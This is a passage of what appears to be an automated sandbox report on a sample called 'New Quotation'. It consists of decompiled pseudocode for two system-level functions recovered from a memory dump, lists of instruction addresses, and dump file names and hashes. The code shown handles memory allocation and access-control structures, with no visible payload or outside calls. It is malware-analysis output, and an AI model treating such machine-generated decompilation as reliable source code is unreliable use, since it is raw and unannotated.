						if( *_a12 != 0) {
							E1D7E3BC0(_t149, 0,  *_t71);
							 *_a12 =  *_a12 & 0x00000000;
						}
						_t72 = _a24;
						if( *_a24 != 0) {
							E1D7E3BC0(_t149, 0,  *_t72);
							 *_a24 =  *_a24 & 0x00000000;
						}
						_t73 = _a16;
						if( *_a16 != 0) {
							E1D7E3BC0(_t149, 0,  *_t73);
							 *_a16 =  *_a16 & 0x00000000;
						}
						if( *_t126 != 0) {
							E1D7E3BC0(_t149, 0,  *_t126);
							 *_t126 =  *_t126 & 0x00000000;
						}
						if(_v5 == 1) {
							_push(_v12);
							E1D812A80();
						}
						_t74 = _t153;
						L14:
						return _t74;
					}
					if(_v6 != 0) {
						_push( &_v12);
						_push(8);
						_push(0xffffffff);
						_t153 = E1D813C30();
						if(_t153 >= 0) {
							_t91 =  *0x1d8c5d78; // 0x0
							_t133 = 0x48;
							_v5 = 1;
							_v36 = _t133;
							_t93 = E1D7E5D90(_t133, _t149, _t91 + 0x140000, _t133);
							 *_a16 = _t93;
							if(_t93 == 0) {
								L16:
								_t153 = 0xc0000017;
								goto L15;
							}
							_push( &_v36);
							_push(_v36);
							_push(_t93);
							_push("true");
							_push(_v12);
							_t94 = E1D812BC0();
							_t126 = _a28;
							_t153 = _t94;
							if(_t153 < 0) {
								goto L25;
							}
							_push( &_v24);
							_push(0);
							_push( *_t126);
							_push(5);
							_push(_v12);
							_t153 = E1D812BC0();
							if(_t153 != 0xc0000023) {
								goto L25;
							}
							_t97 =  *0x1d8c5d78; // 0x0
							_t99 = E1D7E5D90( &_v36, _t149, _t97 + 0x140000, _v24);
							 *_t126 = _t99;
							if(_t99 == 0) {
								goto L25;
							}
							_push( &_v24);
							_push(_v24);
							_push(_t99);
							_push(5);
							_push(_v12);
							_t153 = E1D812BC0();
							if(_t153 < 0) {
								goto L25;
							}
							_push(_v12);
							E1D812A80();
							goto L13;
						}
						_v5 = 0;
						goto L15;
					}
					L13:
					_t74 = 0;
					goto L14;
				}
				_t102 =  *0x1d8c5d78; // 0x0
				_v28 = _t131;
				_t104 = E1D7E5D90(_t131, _t149, _t102 + 0x140000, _t131);
				 *_t152 = _t104;
				if(_t104 == 0) {
					goto L16;
				}
				_push( &_v28);
				_push(_v28);
				_push(_t104);
				_push("true");
				_push(_t125);
				_t153 = E1D812BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_t106 =  *0x1d8c5d78; // 0x0
				_t138 = 0x4c;
				_v32 = _t138;
				_t108 = E1D7E5D90(_t138, _t149, _t106 + 0x140000, _t138);
				 *_a20 = _t108;
				if(_t108 == 0) {
					goto L16;
				}
				_push( &_v32);
				_push(_v32);
				_push(_t108);
				_push(0x19);
				_push(_t125);
				_t153 = E1D812BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_push( &_v16);
				_push(0);
				_push( *_a8);
				_push(5);
				_push(_t125);
				_t153 = E1D812BC0();
				if(_t153 != 0xc0000023) {
					goto L15;
				}
				_t113 =  *0x1d8c5d78; // 0x0
				_t115 = E1D7E5D90( &_v32, _t149, _t113 + 0x140000, _v16);
				 *_a8 = _t115;
				if(_t115 == 0) {
					goto L16;
				}
				_push( &_v16);
				_push(_v16);
				_push(_t115);
				_push(5);
				_push(_t125);
				_t153 = E1D812BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_push( &_v20);
				_push(0);
				_push( *_a12);
				_push(6);
				_push(_t125);
				_t153 = E1D812BC0();
				if(_t153 != 0xc0000023) {
					goto L15;
				}
				_t120 =  *0x1d8c5d78; // 0x0
				_t122 = E1D7E5D90( &_v16, _t149, _t120 + 0x140000, _v20);
				 *_a12 = _t122;
				if(_t122 == 0) {
					goto L16;
				}
				_push( &_v20);
				_push(_v20);
				_push(_t122);
				_push(6);
				_push(_t125);
				_t153 = E1D812BC0();
				if(_t153 < 0) {
					goto L15;
				}
				goto L11;
			}


































                                                                                                                                                                                          0x1d7f9006
                                                                                                                                                                                          0x1d7f900c
                                                                                                                                                                                          0x1d7f900e
                                                                                                                                                                                          0x1d7f9014
                                                                                                                                                                                          0x1d7f9019
                                                                                                                                                                                          0x1d7f901c
                                                                                                                                                                                          0x1d7f9021
                                                                                                                                                                                          0x1d7f9027
                                                                                                                                                                                          0x1d7f902a
                                                                                                                                                                                          0x1d7f902c
                                                                                                                                                                                          0x1d7f9034
                                                                                                                                                                                          0x1d7f9039
                                                                                                                                                                                          0x1d7f903c
                                                                                                                                                                                          0x1d7f903f
                                                                                                                                                                                          0x1d7f9169
                                                                                                                                                                                          0x1d7f9173
                                                                                                                                                                                          0x1d7f9177
                                                                                                                                                                                          0x1d7f918c
                                                                                                                                                                                          0x1d7f918c
                                                                                                                                                                                          0x1d83d491
                                                                                                                                                                                          0x1d83d491
                                                                                                                                                                                          0x1d83d497
                                                                                                                                                                                          0x1d83d49e
                                                                                                                                                                                          0x1d83d4a6
                                                                                                                                                                                          0x1d83d4a6
                                                                                                                                                                                          0x1d83d4a9
                                                                                                                                                                                          0x1d83d4af
                                                                                                                                                                                          0x1d83d4b6
                                                                                                                                                                                          0x1d83d4be
                                                                                                                                                                                          0x1d83d4be
                                                                                                                                                                                          0x1d83d4c1
                                                                                                                                                                                          0x1d83d4c7
                                                                                                                                                                                          0x1d83d4ce
                                                                                                                                                                                          0x1d83d4d6
                                                                                                                                                                                          0x1d83d4d6
                                                                                                                                                                                          0x1d83d4d9
                                                                                                                                                                                          0x1d83d4df
                                                                                                                                                                                          0x1d83d4e6
                                                                                                                                                                                          0x1d83d4ee
                                                                                                                                                                                          0x1d83d4ee
                                                                                                                                                                                          0x1d83d4f1
                                                                                                                                                                                          0x1d83d4f7
                                                                                                                                                                                          0x1d83d4fe
                                                                                                                                                                                          0x1d83d506
                                                                                                                                                                                          0x1d83d506
                                                                                                                                                                                          0x1d83d509
                                                                                                                                                                                          0x1d83d50f
                                                                                                                                                                                          0x1d83d516
                                                                                                                                                                                          0x1d83d51e
                                                                                                                                                                                          0x1d83d51e
                                                                                                                                                                                          0x1d83d524
                                                                                                                                                                                          0x1d83d52b
                                                                                                                                                                                          0x1d83d530
                                                                                                                                                                                          0x1d83d530
                                                                                                                                                                                          0x1d83d537
                                                                                                                                                                                          0x1d83d539
                                                                                                                                                                                          0x1d83d53c
                                                                                                                                                                                          0x1d83d53c
                                                                                                                                                                                          0x1d83d541
                                                                                                                                                                                          0x1d7f9185
                                                                                                                                                                                          0x1d7f9189
                                                                                                                                                                                          0x1d7f9189
                                                                                                                                                                                          0x1d7f917d
                                                                                                                                                                                          0x1d83d3dd
                                                                                                                                                                                          0x1d83d3de
                                                                                                                                                                                          0x1d83d3e0
                                                                                                                                                                                          0x1d83d3e7
                                                                                                                                                                                          0x1d83d3eb
                                                                                                                                                                                          0x1d83d3f6
                                                                                                                                                                                          0x1d83d3fd
                                                                                                                                                                                          0x1d83d404
                                                                                                                                                                                          0x1d83d40a
                                                                                                                                                                                          0x1d83d40d
                                                                                                                                                                                          0x1d83d415
                                                                                                                                                                                          0x1d83d419
                                                                                                                                                                                          0x1d83d3d0
                                                                                                                                                                                          0x1d83d3d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83d3d0
                                                                                                                                                                                          0x1d83d41e
                                                                                                                                                                                          0x1d83d41f
                                                                                                                                                                                          0x1d83d422
                                                                                                                                                                                          0x1d83d423
                                                                                                                                                                                          0x1d83d425
                                                                                                                                                                                          0x1d83d428
                                                                                                                                                                                          0x1d83d42d
                                                                                                                                                                                          0x1d83d430
                                                                                                                                                                                          0x1d83d434
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83d439
                                                                                                                                                                                          0x1d83d43a
                                                                                                                                                                                          0x1d83d43c
                                                                                                                                                                                          0x1d83d43e
                                                                                                                                                                                          0x1d83d440
                                                                                                                                                                                          0x1d83d448
                                                                                                                                                                                          0x1d83d450
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83d452
                                                                                                                                                                                          0x1d83d461
                                                                                                                                                                                          0x1d83d466
                                                                                                                                                                                          0x1d83d46a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83d46f
                                                                                                                                                                                          0x1d83d470
                                                                                                                                                                                          0x1d83d473
                                                                                                                                                                                          0x1d83d474
                                                                                                                                                                                          0x1d83d476
                                                                                                                                                                                          0x1d83d47e
                                                                                                                                                                                          0x1d83d482
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83d484
                                                                                                                                                                                          0x1d83d487
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83d487
                                                                                                                                                                                          0x1d83d3ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83d3ed
                                                                                                                                                                                          0x1d7f9183
                                                                                                                                                                                          0x1d7f9183
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9183
                                                                                                                                                                                          0x1d7f9045
                                                                                                                                                                                          0x1d7f9050
                                                                                                                                                                                          0x1d7f9055
                                                                                                                                                                                          0x1d7f905a
                                                                                                                                                                                          0x1d7f905e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9067
                                                                                                                                                                                          0x1d7f9068
                                                                                                                                                                                          0x1d7f906b
                                                                                                                                                                                          0x1d7f906c
                                                                                                                                                                                          0x1d7f906e
                                                                                                                                                                                          0x1d7f9074
                                                                                                                                                                                          0x1d7f9078
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f907e
                                                                                                                                                                                          0x1d7f9085
                                                                                                                                                                                          0x1d7f908c
                                                                                                                                                                                          0x1d7f9091
                                                                                                                                                                                          0x1d7f9099
                                                                                                                                                                                          0x1d7f909d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f90a6
                                                                                                                                                                                          0x1d7f90a7
                                                                                                                                                                                          0x1d7f90aa
                                                                                                                                                                                          0x1d7f90ab
                                                                                                                                                                                          0x1d7f90ad
                                                                                                                                                                                          0x1d7f90b3
                                                                                                                                                                                          0x1d7f90b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f90c0
                                                                                                                                                                                          0x1d7f90c4
                                                                                                                                                                                          0x1d7f90c6
                                                                                                                                                                                          0x1d7f90c8
                                                                                                                                                                                          0x1d7f90ca
                                                                                                                                                                                          0x1d7f90d0
                                                                                                                                                                                          0x1d7f90d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f90de
                                                                                                                                                                                          0x1d7f90ed
                                                                                                                                                                                          0x1d7f90f5
                                                                                                                                                                                          0x1d7f90f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9102
                                                                                                                                                                                          0x1d7f9103
                                                                                                                                                                                          0x1d7f9106
                                                                                                                                                                                          0x1d7f9107
                                                                                                                                                                                          0x1d7f9109
                                                                                                                                                                                          0x1d7f910f
                                                                                                                                                                                          0x1d7f9113
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9118
                                                                                                                                                                                          0x1d7f911c
                                                                                                                                                                                          0x1d7f911e
                                                                                                                                                                                          0x1d7f9120
                                                                                                                                                                                          0x1d7f9122
                                                                                                                                                                                          0x1d7f9128
                                                                                                                                                                                          0x1d7f9130
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9132
                                                                                                                                                                                          0x1d7f9141
                                                                                                                                                                                          0x1d7f9149
                                                                                                                                                                                          0x1d7f914d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9156
                                                                                                                                                                                          0x1d7f9157
                                                                                                                                                                                          0x1d7f915a
                                                                                                                                                                                          0x1d7f915b
                                                                                                                                                                                          0x1d7f915d
                                                                                                                                                                                          0x1d7f9163
                                                                                                                                                                                          0x1d7f9167
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 657c09bd47f38984ca2616b24bdea67881fa352c3f815379d9b6100a3210487e
                                                                                                                                                                                          • Instruction ID: e95771f55a57fdb39943e1515b7aeea62c1f608530ee8686fef403cc07daf285
                                                                                                                                                                                          • Opcode Fuzzy Hash: 657c09bd47f38984ca2616b24bdea67881fa352c3f815379d9b6100a3210487e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0A15B71900215BFEB128F58CC95FAE77B8AF49751F020464FA04AB2A0D7B5EC50CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D855D60 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E1D855D60(signed char* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _t85;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t106;
				signed int _t109;
				signed int _t113;
				signed int _t115;
				void* _t126;
				void* _t127;
				signed int _t131;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t135;
				void* _t138;
				signed int _t141;
				void* _t143;
				signed int _t145;
				signed int _t146;
				signed int _t153;
				void* _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;
				signed int _t160;
				intOrPtr _t164;
				signed char* _t165;
				signed int _t167;

				_v24 = 0;
				_t163 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t138 = 8;
				_t156 = _t138;
				_v32 = 0;
				_v16 = _t156;
				_v20 = 0;
				_v12 = 0;
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_v28 = 0;
				if(_a8 <= 0) {
					L13:
					_push("true");
					_pop(_t143);
					if(_t138 == 8) {
						L16:
						if(_t156 == 8) {
							L19:
							_t85 =  *0x1d8c5d78; // 0x0
							_t164 = E1D7E5D90(_t143, _t163, _t85 + 0x140000, _t143);
							if(_t164 == 0) {
								L27:
								_t167 = 0xc0000017;
								L52:
								return _t167;
							}
							_t89 = _t164 + 0x14;
							if(_t138 == 8) {
								L23:
								_t144 = _v16;
								if(_v16 == 8) {
									L25:
									_t90 =  *0x1d8c5d78; // 0x0
									_t139 = _v8;
									_t92 = E1D7E5D90(_t144, _v8, _t90 + 0x140000, _v20);
									_v12 = _t92;
									if(_t92 != 0) {
										_v36 = _v36 & 0x00000000;
										__eflags = _a8;
										if(_a8 <= 0) {
											L42:
											_t167 = E1D7F8770(_t164, 1);
											__eflags = _t167;
											if(_t167 < 0) {
												L49:
												E1D7E3BC0(_t139, 0, _t164);
												L50:
												_t95 = _v12;
												if(_v12 != 0) {
													E1D7E3BC0(_t139, 0, _t95);
												}
												goto L52;
											}
											_t167 = E1D7F8710(_t164, _a12, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = E1D7F86B0(_t164, _a16, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = E1D7F8640(_t164, 1, _v24, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											__eflags = _v32;
											_t167 = E1D807F70(_t164, (_v32 & 0xffffff00 | _v32 != 0x00000000) & 0x000000ff, _v32, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = 0;
											 *_a20 = _t164;
											goto L50;
										}
										_t141 =  &(_a4[4]);
										__eflags = _t141;
										do {
											_t157 = 0;
											_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t141 + 4))));
											_v28 = _t106;
											_t145 = 8 + ( *(_t106 + 1) & 0x000000ff) * 4;
											_t109 =  *(_t141 - 4) & 0x000000ff;
											__eflags = _t109;
											if(_t109 == 0) {
												_t146 = _t145 + 0xc;
												__eflags = _t146;
												_v20 = _v24;
												_v16 = _t146;
												_t113 = E1D856844(_v12, _t146,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
												L37:
												_t145 = _v16;
												_t167 = _t113;
												_t157 = _v20;
												L38:
												__eflags = _t167;
												if(__eflags < 0) {
													L48:
													_t139 = _v8;
													goto L49;
												}
												_t167 = E1D7CAFD0(_t145, __eflags, _t157, 2, 0xffffffff, _v12, _t145);
												__eflags = _t167;
												if(_t167 < 0) {
													goto L48;
												}
												goto L40;
											}
											_t115 = _t109 - 1;
											__eflags = _t115;
											if(_t115 == 0) {
												_v20 = _v24;
												_v16 = _t145 + 0xc;
												_t113 = E1D8568BC(_v12, _t145 + 0xc,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
												goto L37;
											}
											__eflags = _t115 != 1;
											if(_t115 != 1) {
												goto L38;
											}
											_v20 = _v32;
											_v16 = _t145 + 0xc;
											_t113 = E1D856880(_v12, _t145 + 0xc,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
											goto L37;
											L40:
											_t141 = _t141 + 0xc;
											_t160 = _v36 + 1;
											_v36 = _t160;
											__eflags = _t160 - _a8;
										} while (_t160 < _a8);
										_t139 = _v8;
										goto L42;
									}
									_t167 = 0xc0000017;
									goto L49;
								}
								_v32 = _t89;
								_t167 = E1D7F7C20(_t89, _t144, 2);
								if(_t167 < 0) {
									goto L48;
								}
								goto L25;
							}
							_v24 = _t89;
							_v36 = _t89 + _t138;
							_t167 = E1D7F7C20(_t89, _t138, 2);
							if(_t167 < 0) {
								goto L48;
							}
							_t89 = _v36;
							goto L23;
						}
						_t126 = _t143 + _t156;
						if(_t126 < _t143) {
							goto L27;
						}
						_t143 = _t126;
						goto L19;
					}
					_t26 = _t138 + 0x14; // 0x1c
					_t127 = _t26;
					if(_t127 < _t143) {
						goto L27;
					}
					_t143 = _t127;
					goto L16;
				}
				_t165 = _a4;
				do {
					_t153 =  *( *(_t165[8]) + 1) & 0x000000ff;
					_t131 =  *_t165 & 0x000000ff;
					if(_t131 == 0) {
						L7:
						_t132 = 0x14 + _t153 * 4;
						_t154 = _t132 + _t138;
						__eflags = _t154 - _t138;
						if(_t154 < _t138) {
							goto L27;
						}
						_t138 = _t154;
						goto L9;
					}
					_t135 = _t131 - 1;
					if(_t135 == 0) {
						goto L7;
					}
					if(_t135 != 1) {
						return 0xc000000d;
					}
					_t132 = 0x14 + _t153 * 4;
					_t155 = _t132 + _t156;
					if(_t155 < _t156) {
						goto L27;
					}
					_t156 = _t155;
					_v16 = _t156;
					L9:
					if(_v20 <= _t132) {
						_v20 = _t132;
					}
					_t165 =  &(_t165[0xc]);
					_t134 = _v28 + 1;
					_v28 = _t134;
				} while (_t134 < _a8);
				_t163 = _v8;
				goto L13;
			}







































                                                                                                                                                                                          0x1d855d74
                                                                                                                                                                                          0x1d855d78
                                                                                                                                                                                          0x1d855d7d
                                                                                                                                                                                          0x1d855d7f
                                                                                                                                                                                          0x1d855d80
                                                                                                                                                                                          0x1d855d83
                                                                                                                                                                                          0x1d855d86
                                                                                                                                                                                          0x1d855d89
                                                                                                                                                                                          0x1d855d8c
                                                                                                                                                                                          0x1d855d8f
                                                                                                                                                                                          0x1d855d95
                                                                                                                                                                                          0x1d855e00
                                                                                                                                                                                          0x1d855e00
                                                                                                                                                                                          0x1d855e02
                                                                                                                                                                                          0x1d855e06
                                                                                                                                                                                          0x1d855e15
                                                                                                                                                                                          0x1d855e18
                                                                                                                                                                                          0x1d855e27
                                                                                                                                                                                          0x1d855e27
                                                                                                                                                                                          0x1d855e39
                                                                                                                                                                                          0x1d855e3d
                                                                                                                                                                                          0x1d855ead
                                                                                                                                                                                          0x1d855ead
                                                                                                                                                                                          0x1d85602c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85602c
                                                                                                                                                                                          0x1d855e3f
                                                                                                                                                                                          0x1d855e45
                                                                                                                                                                                          0x1d855e67
                                                                                                                                                                                          0x1d855e67
                                                                                                                                                                                          0x1d855e6d
                                                                                                                                                                                          0x1d855e85
                                                                                                                                                                                          0x1d855e85
                                                                                                                                                                                          0x1d855e8d
                                                                                                                                                                                          0x1d855e97
                                                                                                                                                                                          0x1d855e9c
                                                                                                                                                                                          0x1d855ea1
                                                                                                                                                                                          0x1d855ec1
                                                                                                                                                                                          0x1d855ec5
                                                                                                                                                                                          0x1d855ec9
                                                                                                                                                                                          0x1d855fa9
                                                                                                                                                                                          0x1d855fb1
                                                                                                                                                                                          0x1d855fb3
                                                                                                                                                                                          0x1d855fb5
                                                                                                                                                                                          0x1d856013
                                                                                                                                                                                          0x1d856017
                                                                                                                                                                                          0x1d85601c
                                                                                                                                                                                          0x1d85601c
                                                                                                                                                                                          0x1d856021
                                                                                                                                                                                          0x1d856027
                                                                                                                                                                                          0x1d856027
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d856021
                                                                                                                                                                                          0x1d855fc2
                                                                                                                                                                                          0x1d855fc4
                                                                                                                                                                                          0x1d855fc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855fd3
                                                                                                                                                                                          0x1d855fd5
                                                                                                                                                                                          0x1d855fd7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855fe6
                                                                                                                                                                                          0x1d855fe8
                                                                                                                                                                                          0x1d855fea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855fef
                                                                                                                                                                                          0x1d856001
                                                                                                                                                                                          0x1d856003
                                                                                                                                                                                          0x1d856005
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d856007
                                                                                                                                                                                          0x1d85600c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85600c
                                                                                                                                                                                          0x1d855ed2
                                                                                                                                                                                          0x1d855ed2
                                                                                                                                                                                          0x1d855ed5
                                                                                                                                                                                          0x1d855ed8
                                                                                                                                                                                          0x1d855eda
                                                                                                                                                                                          0x1d855edc
                                                                                                                                                                                          0x1d855ee3
                                                                                                                                                                                          0x1d855eee
                                                                                                                                                                                          0x1d855eee
                                                                                                                                                                                          0x1d855ef0
                                                                                                                                                                                          0x1d855f50
                                                                                                                                                                                          0x1d855f50
                                                                                                                                                                                          0x1d855f55
                                                                                                                                                                                          0x1d855f63
                                                                                                                                                                                          0x1d855f6a
                                                                                                                                                                                          0x1d855f6f
                                                                                                                                                                                          0x1d855f6f
                                                                                                                                                                                          0x1d855f72
                                                                                                                                                                                          0x1d855f74
                                                                                                                                                                                          0x1d855f77
                                                                                                                                                                                          0x1d855f77
                                                                                                                                                                                          0x1d855f79
                                                                                                                                                                                          0x1d856010
                                                                                                                                                                                          0x1d856010
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d856010
                                                                                                                                                                                          0x1d855f8d
                                                                                                                                                                                          0x1d855f8f
                                                                                                                                                                                          0x1d855f91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855f91
                                                                                                                                                                                          0x1d855ef2
                                                                                                                                                                                          0x1d855ef2
                                                                                                                                                                                          0x1d855ef5
                                                                                                                                                                                          0x1d855f2e
                                                                                                                                                                                          0x1d855f3c
                                                                                                                                                                                          0x1d855f43
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855f43
                                                                                                                                                                                          0x1d855ef7
                                                                                                                                                                                          0x1d855efa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855f07
                                                                                                                                                                                          0x1d855f15
                                                                                                                                                                                          0x1d855f1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855f93
                                                                                                                                                                                          0x1d855f96
                                                                                                                                                                                          0x1d855f99
                                                                                                                                                                                          0x1d855f9a
                                                                                                                                                                                          0x1d855f9d
                                                                                                                                                                                          0x1d855f9d
                                                                                                                                                                                          0x1d855fa6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855fa6
                                                                                                                                                                                          0x1d855ea3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855ea3
                                                                                                                                                                                          0x1d855e73
                                                                                                                                                                                          0x1d855e7b
                                                                                                                                                                                          0x1d855e7f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855e7f
                                                                                                                                                                                          0x1d855e4f
                                                                                                                                                                                          0x1d855e52
                                                                                                                                                                                          0x1d855e5a
                                                                                                                                                                                          0x1d855e5e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855e64
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855e64
                                                                                                                                                                                          0x1d855e1a
                                                                                                                                                                                          0x1d855e1f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855e25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855e25
                                                                                                                                                                                          0x1d855e08
                                                                                                                                                                                          0x1d855e08
                                                                                                                                                                                          0x1d855e0d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855e13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855e13
                                                                                                                                                                                          0x1d855d97
                                                                                                                                                                                          0x1d855d9a
                                                                                                                                                                                          0x1d855d9f
                                                                                                                                                                                          0x1d855da6
                                                                                                                                                                                          0x1d855da9
                                                                                                                                                                                          0x1d855dd2
                                                                                                                                                                                          0x1d855dd2
                                                                                                                                                                                          0x1d855dd9
                                                                                                                                                                                          0x1d855ddc
                                                                                                                                                                                          0x1d855dde
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855de4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855de4
                                                                                                                                                                                          0x1d855dab
                                                                                                                                                                                          0x1d855dae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855db3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855eb7
                                                                                                                                                                                          0x1d855db9
                                                                                                                                                                                          0x1d855dc0
                                                                                                                                                                                          0x1d855dc5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855dcb
                                                                                                                                                                                          0x1d855dcd
                                                                                                                                                                                          0x1d855de6
                                                                                                                                                                                          0x1d855de9
                                                                                                                                                                                          0x1d855deb
                                                                                                                                                                                          0x1d855deb
                                                                                                                                                                                          0x1d855df1
                                                                                                                                                                                          0x1d855df4
                                                                                                                                                                                          0x1d855df5
                                                                                                                                                                                          0x1d855df8
                                                                                                                                                                                          0x1d855dfd
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 79e1b564dea3d1bf1243e090a776f17815448842f0f0394d389c5b71429df626
                                                                                                                                                                                          • Instruction ID: 2dd4fb637b3de586f53643b9d6cd328c45bfbdc06f4c4af17eb5382bbf049b18
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79e1b564dea3d1bf1243e090a776f17815448842f0f0394d389c5b71429df626
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C91BF75E04219AFCF15CFA8E885BAEBBB5EF49750F1141A9E600EB350D734E900DBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D82693A Relevance: .2, Instructions: 226COMMON
